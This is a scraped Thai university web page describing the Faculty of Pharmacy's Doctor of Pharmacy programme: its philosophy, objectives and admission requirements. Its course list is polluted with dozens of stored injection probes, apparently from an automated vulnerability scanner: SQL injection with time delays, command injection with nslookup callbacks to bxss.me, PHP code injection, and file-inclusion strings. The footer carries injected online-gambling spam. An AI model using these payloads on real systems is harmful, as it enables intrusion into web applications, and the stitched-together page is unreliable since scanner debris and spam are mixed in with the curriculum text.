ข่าวประชาสัมพันธ์

ข้อมูลหลักสูตรคณะเภสัชศาสตร์

- หลักสูตรวิทยาศาสตรมหาบัณฑิต

- หลักสูตรวิทยาศาสตรมหาบัณฑิต

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- response.write(9373418*9779540)

- '+response.write(9373418*9779540)+'

- "+response.write(9373418*9779540)+"

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- echo pgbsow$()\ remnvl\nz^xyu||a #' &echo pgbsow$()\ remnvl\nz^xyu||a #|" &echo pgbsow$()\ remnvl\nz^xyu||a #

- &echo hdvglq$()\ naraao\nz^xyu||a #' &echo hdvglq$()\ naraao\nz^xyu||a #|" &echo hdvglq$()\ naraao\nz^xyu||a #

- |echo odbfsq$()\ jpjpow\nz^xyu||a #' |echo odbfsq$()\ jpjpow\nz^xyu||a #|" |echo odbfsq$()\ jpjpow\nz^xyu||a #

- (nslookup hitmyxxkzvbcab8c51.bxss.me||perl -e "gethostbyname('hitmyxxkzvbcab8c51.bxss.me')")

- $(nslookup hityoiqdjhcqa65f56.bxss.me||perl -e "gethostbyname('hityoiqdjhcqa65f56.bxss.me')")

- &(nslookup hitsnuxzltucd5cf9b.bxss.me||perl -e "gethostbyname('hitsnuxzltucd5cf9b.bxss.me')")&'\"`0&(nslookup hitsnuxzltucd5cf9b.bxss.me||perl -e "gethostbyname('hitsnuxzltucd5cf9b.bxss.me')")&`'

- |(nslookup hitqebadrtmpr9e29b.bxss.me||perl -e "gethostbyname('hitqebadrtmpr9e29b.bxss.me')")

- `(nslookup hitjobvblwayd6b8b7.bxss.me||perl -e "gethostbyname('hitjobvblwayd6b8b7.bxss.me')")`

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

-

- ncMUFCMU

- ${9999833+9999802}

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

- 1some_inexistent_file_with_long_name.jpg

- Http://bxss.me/t/fit.txt

- http://bxss.me/t/fit.txt?.jpg

- bxss.me

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- )

- !(()&&!|*|*|

- ^(#$!@#$)(()))******

- ncMUFCMU

- ncMUFCMU

- '.gethostbyname(lc('hitqq'.'naibghwq745fd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(84).chr(105).chr(75).'

- ".gethostbyname(lc("hityn"."irgewboa6df5a.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(72).chr(100).chr(81)."

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- add_curriculum.php

- add_curriculum.php

- add_curriculum.php/.

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

- ';print(md5(31337));$a='

- ";print(md5(31337));$a="

- ${@print(md5(31337))}

- ${@print(md5(31337))}\

- '.print(md5(31337)).'

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- IbWHygOf

- -1 OR 2+934-934-1=0+0+0+1 --

- -1 OR 2+540-540-1=0+0+0+1

- -1' OR 2+786-786-1=0+0+0+1 --

- -1' OR 2+718-718-1=0+0+0+1 or 'RNwwOA98'='

- -1" OR 2+427-427-1=0+0+0+1 --

- if(now()=sysdate(),sleep(15),0)

- 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

- 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

- (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

- 1 waitfor delay '0:0:15' --

- SAblG4WB'; waitfor delay '0:0:15' --

- iSpRILkP' OR 168=(SELECT 168 FROM PG_SLEEP(15))--

- TgHmQlQ1') OR 30=(SELECT 30 FROM PG_SLEEP(15))--

- veRSmKeX')) OR 434=(SELECT 434 FROM PG_SLEEP(15))--

- ncMUFCMU'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

- 1'"

- @@3wKV6

Media

หลักสูตรวิทยาศาสตรมหาบัณฑิต

@@dwn8M

รหัสและชื่อหลักสูตร

(ภาษาไทย):      เภสัชศาสตรบัณฑิต
(ภาษาอังกฤษ):   Doctor of Pharmacy Program

ชื่อปริญญา

ชื่อเต็ม (ภาษาไทย):      เภสัชศาสตรบัณฑิต
ชื่อย่อ (ภาษาไทย):       ภ.บ.
ชื่อเต็ม (ภาษาอังกฤษ):   Doctor of Pharmacy
ชื่อย่อ (ภาษาอังกฤษ):    Pharm.D.

จำนวนหน่วยกิตที่เรียนตลอดหลักสูตร

229 หน่วยกิต

รูปแบบของหลักสูตร
1.  ปรัชญา ความสำคัญ และวัตถุประสงค์ของหลักสูตร

1.1  ปรัชญา

ผลิตบัณฑิตทางเภสัชศาสตร์ตามมาตรฐานสากล โดยมุ่งเน้นการสร้างเภสัชกรที่มีความรอบรู้ทั้งวิชาการและวิชาชีพ มีทักษะด้านการบริบาลทางเภสัชกรรมและด้านเภสัชกรรมเทคโนโลยีและการพัฒนาเภสัชภัณฑ์ รวมถึงการวิจัย สามารถประกอบวิชาชีพเภสัชกรรมคู่จริยธรรมและคุณธรรมดีงาม มีจิตสำนึกการให้บริการแก่สังคมและเป็นพลเมืองดี 

1.2  วัตถุประสงค์

คณะเภสัชศาสตร์มหาวิทยาลัยหัวเฉียวเฉลิมพระเกียรติได้กำหนดวัตถุประสงค์ของหลักสูตรเพื่อผลิตบัณฑิตที่มีคุณลักษณะดังนี้

 • มีคุณธรรม จริยธรรม จรรยาบรรณและเจตคติที่ดี เหมาะสมต่อการประกอบวิชาชีพเภสัชกรรม อุทิศตน เสียสละ และมีความรับผิดชอบต่อตนเองและสังคม
 • มีความรู้ความสามารถในการประยุกต์และบูรณาการหลักการและทฤษฎีทางเภสัชศาสตร์ในการประกอบวิชาชีพเภสัชกรรมให้เป็นไปตามมาตรฐานวิชาชีพของแต่ละสาขาวิชา
 • สามารถคิดวิเคราะห์ สังเคราะห์ และแก้ปัญหาด้วยตนเองอย่างเป็นระบบและมีวิจารณญาณบนหลักฐานทางวิชาการ
 • เป็นแบบอย่างที่ดีและเป็นที่พึ่งของสังคมด้านยาและสุขภาพ
 • มีความใฝ่รู้และมีความสามารถในการเรียนรู้ตลอดชีวิต สามารถพัฒนาและปรับปรุงตนเองให้สอดคล้องกับการเปลี่ยนแปลงของสังคม
 • มีภาวะผู้นำ สามารถทำงานเป็นทีมและพร้อมนำการเปลี่ยนแปลง
 • มีความสามารถในการสื่อสารและใช้เทคโนโลยีสารสนเทศอย่างเหมาะสมและเป็นสากล
 • มีความสามารถในการจัดการด้านยาและผลิตภัณฑ์สุขภาพในระบบสุขภาพระดับปฐมภูมิ

2.  คุณสมบัติของผู้เข้าศึกษา

 • ต้องเป็นผู้ที่สำเร็จการศึกษาระดับมัธยมศึกษาตอนปลายตามหลักสูตรของกระทรวงศึกษาธิการ หรือมีความรู้เทียบเท่าตามที่กระทรวงศึกษาธิการรับรอง
 • เป็นไปตามระเบียบของมหาวิทยาลัยหัวเฉียวเฉลิมพระเกียรติ ว่าด้วยการศึกษาระดับปริญญาตรี พ.ศ. 2552 (ภาคผนวก ก)
 • มีเจตคติที่ดีต่อวิชาชีพเภสัชกรรม

 ผลลัพธ์การเรียนรู้ที่คาดหวังจากหลักสูตร (PLOs) (คลิก)

 คำอธิบายรายวิชา หลักสูตร ภ.บ. 2564 (คลิก)

 แผนการศึกษา หลักสูตร ภ.บ. 2564 (คลิก)

 รายละเอียดของหลักสูตร ภ.บ. 2557 (คลิก)

 แผนการศึกษา หลักสูตร ภ.บ. 2557 (คลิก)


slot dana slot gacor slot online slot via dana slot deposit dana situs slot dana admin jarwo
pharmacy.hcu.ac.th © Copyright 2016, All Rights Reserved Designed & developed by: Noppol Saechua